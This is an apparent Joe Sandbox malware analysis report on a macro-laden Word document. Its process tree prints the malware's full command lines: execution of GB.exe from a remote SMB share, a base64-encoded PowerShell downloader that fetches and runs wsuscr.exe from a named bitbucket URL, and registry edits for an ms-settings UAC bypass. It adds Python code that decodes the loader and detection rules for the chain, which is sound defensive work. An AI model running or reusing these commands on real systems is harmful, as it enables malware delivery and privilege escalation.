
Windows Analysis Report
42#U0430.doc

Overview

General Information

Sample name: 42#U0430.doc (renamed because original name is a hash value; "#U0430" is Joe Sandbox's escape for the non-ASCII character U+0430, Cyrillic small "а")
Original sample name: .doc
Analysis ID: 1365471
MD5: de2e053acae98adbecc23ab3c0e9cf5d
SHA1: e404f9ff6a3d92fd7e153bb695be9c9eabc23d6c
SHA256: 93aa6fc207df430a6e9833259e618895bcdb75c7db0850599d3dbb87d47a54c7

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Document Viewer accesses SMB path (likely to steal NTLM hashes or to download payload)
Document contains an embedded VBA macro which may execute processes
Document contains an embedded VBA macro with suspicious strings
Document exploit detected (process start blacklist hit)
Installs new ROOT certificates
Machine Learning detection for sample
Opens network shares
Powershell uses Background Intelligent Transfer Service (BITS)
Suspicious powershell command line found
Uses cmd line tools excessively to alter registry or file data
Very long command line found
AV process strings found (often used to terminate AV products)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Document misses a certain OLE stream usually present in this Microsoft Office document type
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Stores large binary data to the registry
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • Classification label: mal100.spyw.expl.evad.winDOC@27/19@6/1

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 3204 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • explorer.exe (PID: 3292 cmdline: explorer.exe "\\89.23.98.22\LN\" MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
    • GB.exe (PID: 3444 cmdline: \\89.23.98.22\LN\GB.exe MD5: C3E7CFA2E076C3CA421DDC00496C71B5)
      • cmd.exe (PID: 3484 cmdline: cmd.exe /c res.bat && test2.exe MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
        • cmd.exe (PID: 3524 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo f " MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
        • xcopy.exe (PID: 3532 cmdline: xcopy /s test2.exe "C:\Users\user\AppData\Local\Temp\persistent2\test2.exe" MD5: 20CF8728C55A8743AAC86FB8D30EA898)
        • powershell.exe (PID: 3560 cmdline: powershell -Command "[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('ZgB1AG4AYwB0AGkAbwBuACAARwBlAHQALQBEAGUAYwBvAG0AcAByAGUAcwBzAGUAZABCAHkAdABlAEEAcgByAGEAeQAgAHsACgAKACAAIAAgACAAIAAgACAAIABbAEMAbQBkAGwAZQB0AEIAaQBuAGQAaQBuAGcAKAApAF0ACgAgACAAIAAgAFAAYQByAGEAbQAgACgACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFsAUABhAHIAYQBtAGUAdABlAHIAKABNAGEAbgBkAGEAdABvAHIAeQAsAFYAYQBsAHUAZQBGAHIAbwBtAFAAaQBwAGUAbABpAG4AZQAsAFYAYQBsAHUAZQBGAHIAbwBtAFAAaQBwAGUAbABpAG4AZQBCAHkAUAByAG8AcABlAHIAdAB5AE4AYQBtAGUAKQBdAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJAAoAFQAaAByAG8AdwAoACIALQBiAHkAdABlAEEAcgByAGEAeQAgAGkAcwAgAHIAZQBxAHUAaQByAGUAZAAiACkAKQAKACAAIAAgACAAKQAKACAAIAAgACAAIAAgACAAIABQAHIAbwBjAGUAcwBzACAAewAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFcAcgBpAHQAZQAtAFYAZQByAGIAbwBzAGUAIAAiAEcAZQB0AC0ARABlAGMAbwBtAHAAcgBlAHMAcwBlAGQAQgB5AHQAZQBBAHIAcgBhAHkAIgAKACAAIAAgACAAIAAgACAAIAAkAGkAbgBwAHUAdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAoACAALAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAApAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABvAHUAdABwAHUAdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAKACAAIAAgACAAIAAgACAAIAAkAGcAegBpAHAAUwB0AHIAZQBhAG0AIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARwB6AGkAcABTAHQAcgBlAGEAbQAgACQAaQBuAHAAdQB0ACwAIAAoAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABnAHoAaQBwAFMAdAByAGUAYQBtAC4AQwBvAHAAeQBUAG8AKAAgACQAbwB1AHQAcAB1AHQAIAApAAoAIAAgACAAIAAgACAAIAAgACQAZwB6AGkAcABTAHQAcgBlAGEAbQAuAEMAbABvAHMAZQAoACkACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAaQBuAHAAdQB0AC4AQwBsAG8AcwBlACgAKQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAWwBiAHkAdABlAFsAXQBdACAAJABiAHkAdABlAE8AdQB0AEEAcgByAGEAeQAgAD0AIAAkAG8A
dQB0AHAAdQB0AC4AVABvAEEAcgByAGEAeQAoACkACgAgACAAIAAgACAAIAAgACAAVwByAGkAdABlAC0ATwB1AHQAcAB1AHQAIAAkAGIAeQB0AGUATwB1AHQAQQByAHIAYQB5AAoAIAAgACAAIAB9AAoAfQAKAAoAWwBiAHkAdABlAFsAXQBdACAAJABiAHkAdABlAF8AYQByAHIAYQB5ACAAPQAgADMAMQAsADEAMwA5ACwAOAAsADAALAAwACwAMAAsADAALAAwACwANAAsADAALAAxADQAOQAsADEANAA0ACwAMQA5ADMALAAxADEANAAsADEAMwAwACwANAA4ACwAMgAwACwANgA5ACwAMQAyADcALAA0ADEALAA5ADYALAAxADAAOQAsADEAOQA5ACwAMQAzADMALAAxADEALAA1ACwAMQA0ADYALAA5ACwAMwA1ACwAMQA3ADcALAAyACwAMQAyADUALAA5ACwAMQAxADEALAAxADAAMwAsADYANgAsADcALAAxADcAMQAsADEAMgA5ACwANAA2ACwANgA4ACwANwA3ACwAMgA0ADgALAAyADUAMAAsADcAMAAsADEAOAA2ACwAMgAzADkALAA3ADYALAAxADEAOQAsADEAMQAxACwAMQAxADMALAAyADMAMQAsADEANQA4ACwAMgA0ADMALAAxADcANAAsADIAMwAzACwAOQA3ACwAMgAyADQALAAxADQAMAAsADkANAAsADQAOAAsADIAMQA3ACwAMgA0ADIALAAxADMAOAAsADgALAA4ADAALAA4ADQALAAyADIAMAAsADEAMQAzACwANAAwACwAMgAzACwAMQA0ADEALAAyADAAMgAsADEANwAzACwAMgAwADIALAAxADkANgAsADEAOAAxACwAOAAxACwAOQA4ACwANgA2ACwAMwA3ACwAMgAwADQALAAxADcANAAsADkANQAsADEANAAxACwAMgA0ACwAMQA4ADUALAAyADUAMAAsADIAMAAwACwAMgAyADQALAAxADcAMAAsADEANgA5ACwAMQAyADMALAA1ADUALAAxADIALAAxADEAMAAsADEAMwA4ACwAMQAzADcALAAxADgANwAsADEANQAwACwAMgAwADkALAA3ADMALAAyADQANwAsADEAMwA1ACwAMQAxADAALAAyADMALAAzADEALAAxADgANgAsADEANQA2ACwAMgAwACwAMQA3ADUALAAxADMAOAAsADYANgAsADIAMAAwACwAMgAzADEALAAxADQANwAsADIAMAAyACwAMQAwADQALAA4ADYALAAxADIANwAsADIAMQA2ACwAMQAyADUALAAxADYANQAsADkANAAsADkAMgAsADEAOAA0ACwAMwAxACwAMwA4ACwANAAzACwANwA5ACwANAA1ACwAMQA2ADMALAAxADYANgAsADEAMAAyACwAMQA3ADEALAAxADEANQAsADMANQAsADEANQA3ACwAMQAsADYALAAxADYAMwAsADEANgAxACwAMgAzADgALAAyADQAMQAsADIAMAA0ACwAMwAwACwAMQA0ADkALAAzADIALAA0ADAALAAxADUAMQAsADEANgA0ACwAMQA3ADYALAAxADQAMgAsADQALAAyADIALAA0ADEALAAxADkAMAAsADEANQAwACwAMgA0ADYALAAxADQANwAsADEAMgA1ACwAMQAyACwANgAwACwAOAA5ACwAMgA0ADUALAA2ADAALAAyADkALAA2ADEALAA3ADQALAAyADEAMQAsADUAMwAsADEANwA4ACwAMQA4ADgALAAyADQAMAAsADEANgA0ACwAMgA1ADMALAAyADEAMQAsADgAMQAsADEANwAxACwAOQA4ACwANQAyACwANAA5ACwAMQA0ADQALAAxADUAMAAsADIAMQA3ACwAMgA3ACwANAA2ACwAMQAzADIALAA1ADcALAA0ADQALAAxADkAMgAsADYA
NwAsADEANQAsADYAMgAsADIANAA3ACwAMQA1ADUALAA1ADkALAAzADgALAAxADUANQAsADkANwAsADIANQA0ACwAMQA5ADMALAAxADUANQAsADIAMgA0ACwAMgAxADgALAAxADEANgAsADEAMgAzACwAMQA5ADEALAAyADMANwAsADEAMQA3ACwAOQAyACwAMQAyADYALAAxADYAMwAsADEAMgA0ACwANQA4ACwAMgA0ADAALAAyADcALAAxADcAMAAsADEANAA3ACwAMgAyADEALAA3ADEALAAxADMAMAAsADEAMwAyACwANwA4ACwAMQA3ADgALAAzACwAMQAxADMALAA2ADkALAA5ACwAMQA1ACwAMQA1ADgALAA2ADgALAAxADkALAA3ADkALAAxADMAOQAsADUANQAsADUAMQAsADEAMQAxACwAOAA0ACwAOQAwACwAMgAwADUALAAxADIAOAAsADkANgAsADEAOAAxACwAMgA1ACwAMQA3ADAALAAxADAAOAAsADcANgAsADEALAA5ADIALAAxADcAMwAsADkAOQAsADMANgAsADEAMAA5ACwANwA2ACwANgAxACwAMQAzADAALAA3ADUALAA1ADMALAAxADYAMwAsADgAMwAsADkANgAsADcAOQAsADQAMgAsADgAOQAsADEAMwA0ACwANwA3ACwAOQAwACwANQAxACwANQAxACwAMgAwADcALAAxADkAMQAsADIAMwA4ACwAMgA0ACwANQA0ACwANgA3ACwAOAA1ACwAMgAxADgALAAyADUANQAsADIANQAwACwAMgAwADcALAAyADkALAAyADIAMQAsADEAMgAyACwAMgA1ADMALAAzACwANAAsADEANwA4ACwAMgA1ADMALAAxADcANAAsADEANgA0ACwAMQAsADAALAAwAAoAJABkAGUAYwBvAG0AcAByAGUAcwBzAGUAZABCAHkAdABlAEEAcgByAGEAeQAgAD0AIABHAGUAdAAtAEQAZQBjAG8AbQBwAHIAZQBzAHMAZQBkAEIAeQB0AGUAQQByAHIAYQB5ACAALQBiAHkAdABlAEEAcgByAGEAeQAgACQAYgB5AHQAZQBfAGEAcgByAGEAeQAKAAoAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgAIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAgACQAZABlAGMAbwBtAHAAcgBlAHMAcwBlAGQAQgB5AHQAZQBBAHIAcgBhAHkAIAApACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApACkAKQAgAHwAIABJAG4AdgBvAGsAZQAtAEUAeABwAHIAZQBzAHMAaQBvAG4ACgAKAAoAdwBnAGUAdAAgACIAaAB0AHQAcABzADoALwAvAGIAaQB0AGIAdQBjAGsAZQB0AC4AbwByAGcALwBvAGwAZQBnAG8AdgBpAGMAaAAtADAAMAA3AC8ANwA3ADcALwBkAG8AdwBuAGwAbwBhAGQAcwAvAHcAcwB1AHMAYwByAC4AZQB4AGUAIgAgAC0AbwB1AHQAZgBpAGwAZQAgACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXAB3AHMAdQBzAGMAcgAuAGUAeABlACIACgBJAG4AdgBvAGsAZQAtAEUAeABwAHIAZQBzAHMAaQBvAG4AIAAtAEMAbwBtAG0AYQBuAGQAIAAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwA
dwBzAHUAcwBjAHIALgBlAHgAZQAiAA==')) | Invoke-Expression" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
          • reg.exe (PID: 3720 cmdline: "C:\Windows\system32\reg.exe" add HKCU\Software\Classes\.omg\Shell\Open\command /d C:\Users\ADMINI~1\AppData\Local\Temp\persistent2\test2.exe /f MD5: 9D0B3066FE3D1FD345E86BC7BCCED9E4)
          • reg.exe (PID: 3728 cmdline: "C:\Windows\system32\reg.exe" add HKCU\Software\Classes\ms-settings\CurVer /d .omg /f MD5: 9D0B3066FE3D1FD345E86BC7BCCED9E4)
          • reg.exe (PID: 4056 cmdline: "C:\Windows\system32\reg.exe" delete HKCU\Software\Classes\.omg\ /f MD5: 9D0B3066FE3D1FD345E86BC7BCCED9E4)
          • reg.exe (PID: 4064 cmdline: "C:\Windows\system32\reg.exe" delete HKCU\Software\Classes\ms-settings\ /f MD5: 9D0B3066FE3D1FD345E86BC7BCCED9E4)
    • powershell.exe (PID: 3476 cmdline: powershell.exe -Command Stop-Process -Name explorer MD5: A575A7610E5F003CC36DF39E07C4BA7D)
  • explorer.exe (PID: 3340 cmdline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
  • explorer.exe (PID: 3740 cmdline: explorer.exe MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
    • rundll32.exe (PID: 1132 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\ MD5: DD81D91FF3B0763C392422865C9AC12E)
  • cleanup
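The command line of powershell.exe PID 3560 in the tree above is one base64 string that the loader turns back into a UTF-16LE script and pipes to Invoke-Expression. Decoding it by hand shows a Get-DecompressedByteArray function (a GzipStream over a MemoryStream), a hard-coded [byte[]] $byte_array that starts with the gzip magic 31,139,8 and ends with a gzip trailer whose ISIZE field (164,1,0,0) gives 0x1A4 = 420 decompressed bytes, a line that gunzips that array, base64-decodes the text and pipes it to Invoke-Expression, and finally wget (the Invoke-WebRequest alias) of https://bitbucket.org/olegovich-007/777/downloads/wsuscr.exe to $env:APPDATA\wsuscr.exe followed by Invoke-Expression -Command on that path. The download matches the HTTP GET to bitbucket.org recorded under Networking; the four reg.exe children of PID 3560 do not appear in the readable stage, so they presumably come from the gzipped inner script. The Python below is an added example, not part of the Joe Sandbox report, that automates the unwrapping: it pulls the FromBase64String('...') argument out of a command line, strips the line wrapping a copied report introduces, decodes UTF-16LE, locates the decimal byte list, gunzips and base64-decodes it (Python's gzip module checks the CRC32 and ISIZE trailer for you), and lists the URLs in either stage. Because the sample's real byte array is too long to embed here, the block exercises itself on a constructed command line built with the same layering; the stage-2 text and the example.invalid URL are placeholders. Pass the real command line copied from the process tree to decode_stages() to recover the sample's inner stage.

```python
"""Unwrap the UTF-16LE base64 -> gzip byte array -> base64 PowerShell loader (added example)."""
import base64
import gzip
import re
from typing import Optional

# Outer layer: powershell -Command "[...]::Unicode.GetString([...]::FromBase64String('<b64>')) | Invoke-Expression"
B64_ARG = re.compile(r"FromBase64String\('([^']+)'\)")
# Inner layer: '[byte[]] $byte_array = 31,139,8,...' (decimal list that starts with the gzip magic)
BYTE_LIST = re.compile(r"\[byte\[\]\]\s*\$\w+\s*=\s*((?:\d{1,3}\s*,\s*)+\d{1,3})")
URL = re.compile(r"https?://[^\s\"']+")


def decode_unicode_cmdline(cmdline: str) -> str:
    """Stage 1: base64 of a UTF-16LE script. Whitespace is stripped because report pages wrap the blob."""
    m = B64_ARG.search(cmdline)
    if not m:
        raise ValueError("no FromBase64String('...') literal in command line")
    blob = re.sub(r"\s+", "", m.group(1))
    return base64.b64decode(blob).decode("utf-16-le")


def extract_gzip_bytes(script: str) -> Optional[bytes]:
    """Return the hard-coded byte array as bytes, or None when the script carries none."""
    m = BYTE_LIST.search(script)
    if not m:
        return None
    data = bytes(int(n) for n in re.split(r"\s*,\s*", m.group(1)))
    if data[:2] != b"\x1f\x8b":
        raise ValueError("byte array is not gzip (expected 31,139 header)")
    return data


def decode_stages(cmdline: str) -> dict:
    """Recover stage 1 (UTF-16LE script), stage 2 (gunzip + base64 -> script) and all URLs."""
    stage1 = decode_unicode_cmdline(cmdline)
    stage2 = None
    gz = extract_gzip_bytes(stage1)
    if gz is not None:
        # gzip.decompress verifies the CRC32/ISIZE trailer; the plaintext is base64 of the inner script
        stage2 = base64.b64decode(gzip.decompress(gz)).decode("utf-8")
    urls = URL.findall(stage1 + (stage2 or ""))
    return {"stage1": stage1, "stage2": stage2, "urls": urls}


# ---- constructed input with the same layering (NOT the sample's real blob) ----
def wrap_unicode_cmdline(script: str) -> str:
    """Outer layer exactly as it appears in the process tree."""
    b64 = base64.b64encode(script.encode("utf-16-le")).decode("ascii")
    return ('powershell -Command "[System.Text.Encoding]::Unicode.GetString('
            f"[System.Convert]::FromBase64String('{b64}')) | Invoke-Expression\"")


def build_loader_cmdline(stage2: str, tail: str) -> str:
    """Inner layer: script -> base64 -> gzip -> decimal byte list, followed by the download tail."""
    gz = gzip.compress(base64.b64encode(stage2.encode("utf-8")))
    stage1 = ("function Get-DecompressedByteArray { <# gunzip helper, as in the sample #> }\n"
              "[byte[]] $byte_array = " + ",".join(str(b) for b in gz) + "\n"
              "$decompressedByteArray = Get-DecompressedByteArray -byteArray $byte_array\n"
              "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(("
              " [System.Text.Encoding]::UTF8.GetString( $decompressedByteArray ) | Out-String )))"
              " | Invoke-Expression\n" + tail)
    return wrap_unicode_cmdline(stage1)


CONSTRUCTED_STAGE2 = 'Write-Output "constructed stage-2 script"'          # placeholder, not the real stage 2
CONSTRUCTED_TAIL = ('wget "https://example.invalid/payload.exe" -outfile "$env:APPDATA\\payload.exe"\n'
                    'Invoke-Expression -Command "$env:APPDATA\\payload.exe"')  # hypothetical URL
SAMPLE_CMDLINE = build_loader_cmdline(CONSTRUCTED_STAGE2, CONSTRUCTED_TAIL)

if __name__ == "__main__":
    result = decode_stages(SAMPLE_CMDLINE)
    print("stage 2:", result["stage2"])
    print("urls:", result["urls"])
```

The same decode_stages() call works on the real command line as printed in the process tree, including the line breaks the page introduced inside the base64, because the decoder removes whitespace before decoding.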
Malware Configuration

No configs have been found

Yara Overview

Source: Process Memory Space: powershell.exe PID: 3560 | Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | Author: ditekSHen | Strings:
  • 0xb23:$b2: ::FromBase64String(
  • 0x5df3:$b2: ::FromBase64String(
  • 0x19aa6:$b2: ::FromBase64String(
  • 0x41497:$b2: ::FromBase64String(
  • 0x42c12:$b2: ::FromBase64String(
  • 0x4459d:$b2: ::FromBase64String(
  • 0x4a964:$b2: ::FromBase64String(
  • 0x4c0dc:$b2: ::FromBase64String(
  • 0x60ac2:$b2: ::FromBase64String(
  • 0x69d02:$b2: ::FromBase64String(
  • 0x6e429:$b2: ::FromBase64String(
  • 0x6fba4:$b2: ::FromBase64String(
  • 0x71e6b:$b2: ::FromBase64String(
  • 0xacb82:$b2: ::FromBase64String(
  • 0xad125:$b2: ::FromBase64String(
  • 0xb0309:$b2: ::FromBase64String(
  • 0xb2f1d:$b2: ::FromBase64String(
  • 0xb4f83:$b2: ::FromBase64String(
  • 0xb66fb:$b2: ::FromBase64String(
  • 0xb884a:$b2: ::FromBase64String(
  • 0xb9fc2:$b2: ::FromBase64String(
No Sigma rule has matched
No Snort rule has matched
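No Sigma rule matched in this run, but the process tree carries several behaviours that are straightforward to express as process-creation rules: WINWORD.EXE launching explorer.exe with a UNC path and then executing GB.exe straight from \\89.23.98.22\LN\ (the two VBA Shell calls quoted under System Summary), WINWORD.EXE launching powershell.exe, powershell.exe with a FromBase64String(...) | Invoke-Expression argument, and reg.exe writing HKCU\Software\Classes\ms-settings\CurVer together with a matching <ProgID>\Shell\Open\command. That last pair is the registry layout of the fodhelper.exe UAC bypass: the ms-settings protocol handler is redirected through CurVer to a ProgID whose open command is the payload. fodhelper.exe only exists from Windows 10 on and this analysis ran on Windows 7 (w7x64), which fits the observation that test2.exe is dropped but never started before the keys are deleted again. The Python below is an added example, not a Joe Sandbox or Sigma rule: it encodes those checks and runs them over event records constructed from the report's own process tree (PIDs, images and arguments as listed there; the PID 3560 base64 argument is truncated with "...").

```python
"""Process-creation rules for the chain in this report (added example, not a Joe Sandbox rule)."""
import re
from dataclasses import dataclass
from typing import Callable, Dict, List, Tuple


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    parent_image: str
    image: str
    cmdline: str


def base(path: str) -> str:
    """Lower-cased file name of an image path (works for drive and UNC paths)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
UNC_PATH = re.compile(r'\\\\[^\\\s"]+\\')   # \\host\share\

RULES: Dict[str, Callable[[ProcEvent], bool]] = {
    # WINWORD -> explorer.exe "\\89.23.98.22\LN\"  and  WINWORD -> \\89.23.98.22\LN\GB.exe
    "office_spawns_unc_path": lambda e: base(e.parent_image) in OFFICE and bool(UNC_PATH.search(e.cmdline)),
    # WINWORD -> powershell.exe -Command Stop-Process -Name explorer
    "office_spawns_script_host": lambda e: base(e.parent_image) in OFFICE and base(e.image) in SCRIPT_HOSTS,
    # image loaded straight from an SMB share
    "image_executed_from_unc": lambda e: e.image.startswith("\\\\"),
    # reg.exe add HKCU\Software\Classes\ms-settings\CurVer  (fodhelper-style UAC bypass)
    "ms_settings_curver_hijack": lambda e: base(e.image) == "reg.exe"
        and re.search(r"\badd\b.*\\Classes\\ms-settings\\CurVer", e.cmdline, re.I) is not None,
    # reg.exe add HKCU\Software\Classes\<ProgID>\Shell\Open\command  (the ProgID CurVer points at)
    "hkcu_classes_shell_open_command": lambda e: base(e.image) == "reg.exe"
        and re.search(r"\badd\b\s+HKCU\\Software\\Classes\\.*\\Shell\\Open\\command", e.cmdline, re.I) is not None,
    # powershell -Command "...FromBase64String('...')... | Invoke-Expression"
    "powershell_b64_iex": lambda e: base(e.image) == "powershell.exe"
        and re.search(r"FromBase64String", e.cmdline, re.I) is not None
        and re.search(r"Invoke-Expression|\biex\b", e.cmdline, re.I) is not None,
}


def evaluate(events: List[ProcEvent]) -> List[Tuple[str, int]]:
    """Return (rule name, pid) for every rule that fires on every event."""
    return [(name, e.pid) for e in events for name, pred in RULES.items() if pred(e)]


# ---- event records constructed from the report's process tree ----
WINWORD = r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CMD = r"C:\Windows\System32\cmd.exe"
REG = r"C:\Windows\System32\reg.exe"

SAMPLE_EVENTS = [
    ProcEvent(3292, WINWORD, r"C:\Windows\explorer.exe", r'explorer.exe "\\89.23.98.22\LN\"'),
    ProcEvent(3444, WINWORD, r"\\89.23.98.22\LN\GB.exe", r"\\89.23.98.22\LN\GB.exe"),
    ProcEvent(3484, r"\\89.23.98.22\LN\GB.exe", CMD, "cmd.exe /c res.bat && test2.exe"),
    ProcEvent(3560, CMD, PS,
              "powershell -Command \"[System.Text.Encoding]::Unicode.GetString("
              "[System.Convert]::FromBase64String('ZgB1AG4AYwB0AGkAbwBuACAA...')) | Invoke-Expression\""),  # base64 truncated
    ProcEvent(3720, PS, REG, r'"C:\Windows\system32\reg.exe" add HKCU\Software\Classes\.omg\Shell\Open\command '
                             r'/d C:\Users\ADMINI~1\AppData\Local\Temp\persistent2\test2.exe /f'),
    ProcEvent(3728, PS, REG, r'"C:\Windows\system32\reg.exe" add HKCU\Software\Classes\ms-settings\CurVer /d .omg /f'),
    ProcEvent(3476, WINWORD, PS, "powershell.exe -Command Stop-Process -Name explorer"),
    ProcEvent(3740, "", r"C:\Windows\explorer.exe", "explorer.exe"),   # benign restart of the shell
]

if __name__ == "__main__":
    for rule, pid in evaluate(SAMPLE_EVENTS):
        print(f"{rule:34s} PID {pid}")
```

The cmd.exe (3484) and the restarted explorer.exe (3740) fire nothing, which is the point of keying the rules on parent/child pairs and on specific registry paths rather than on the process names alone.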

AV Detection

Source: 42#U0430.doc | Avira: detected
Source: C:\Users\user\AppData\Local\Temp\~DF23BD85EE3DE97CB5.TMP | Avira: detection malicious, Label: HEUR/Macro.Downloader.AMAK.Gen
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\test2.exe | Virustotal: Detection: 11%
Source: C:\Users\user\AppData\Local\Temp\persistent2\test2.exe | Virustotal: Detection: 11%
Source: 42#U0430.doc | Virustotal: Detection: 41%
Source: 42#U0430.doc | Joe Sandbox ML: detected

Compliance

Source: unknown | HTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.22:49164 version: TLS 1.0
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: CallSite.Target.pdb source: powershell.exe, 0000000B.00000002.391663210.000000001C5D6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wextract.pdbH source: GB.exe, 00000004.00000002.393088212.000000013F041000.00000020.00000001.01000000.00000008.sdmp
Source: Binary string: wextract.pdb source: GB.exe, 00000004.00000002.393088212.000000013F041000.00000020.00000001.01000000.00000008.sdmp, GB.exe, 00000004.00000003.364191812.0000000002AF0000.00000004.00000020.00020000.00000000.sdmp, test2.exe.4.dr, test2.exe.10.dr
Source: Binary string: wextract.pdbGCTL source: GB.exe, 00000004.00000003.364191812.0000000002AF0000.00000004.00000020.00020000.00000000.sdmp, test2.exe.4.dr, test2.exe.10.dr
Source: Binary string: b.pdbpdblib.pdb source: powershell.exe, 0000000B.00000002.391663210.000000001C52D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: gement.Automation.pdb source: powershell.exe, 0000000B.00000002.391663210.000000001C52D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdberShell.Commands.Utility.pdb source: powershell.exe, 0000000B.00000002.391188462.000000001A59F000.00000004.00000020.00020000.00000000.sdmp

Software Vulnerabilities

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Windows\explorer.exe
Source: global traffic | DNS query: name: bitbucket.org
Source: global traffic | DNS query: name: bbuseruploads.s3.amazonaws.com
Source: global traffic | DNS query: name: bbuseruploads.s3.amazonaws.com
Source: global traffic | DNS query: name: bbuseruploads.s3.amazonaws.com
Source: global traffic | DNS query: name: bbuseruploads.s3.amazonaws.com
Source: global traffic | DNS query: name: bbuseruploads.s3.amazonaws.com
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 104.192.141.1:443
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 104.192.141.1:443
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 104.192.141.1:443
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 104.192.141.1:443
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 104.192.141.1:443
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 104.192.141.1:443
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 104.192.141.1:443
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 104.192.141.1:443
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 104.192.141.1:443
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 104.192.141.1:443
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 104.192.141.1:443
Source: global traffic | TCP traffic: 104.192.141.1:443 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 104.192.141.1:443
